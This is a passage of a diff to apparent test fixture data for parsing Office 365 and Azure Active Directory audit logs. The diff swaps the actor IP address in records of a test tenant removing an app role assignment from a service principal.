APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464425\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7f09b681-251f-4ff0-97cf-5247891b6981\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464425\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7f09b681-251f-4ff0-97cf-5247891b6981\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -1231,9 +1231,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:34:06", "ExtendedProperties": [ { @@ -1467,7 +1467,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464434\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d8a2ae24-a752-4f8e-adca-c57189a76a71\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464434\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d8a2ae24-a752-4f8e-adca-c57189a76a71\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -1497,9 +1497,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:34:06", "ExtendedProperties": [ { @@ -1733,7 +1733,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 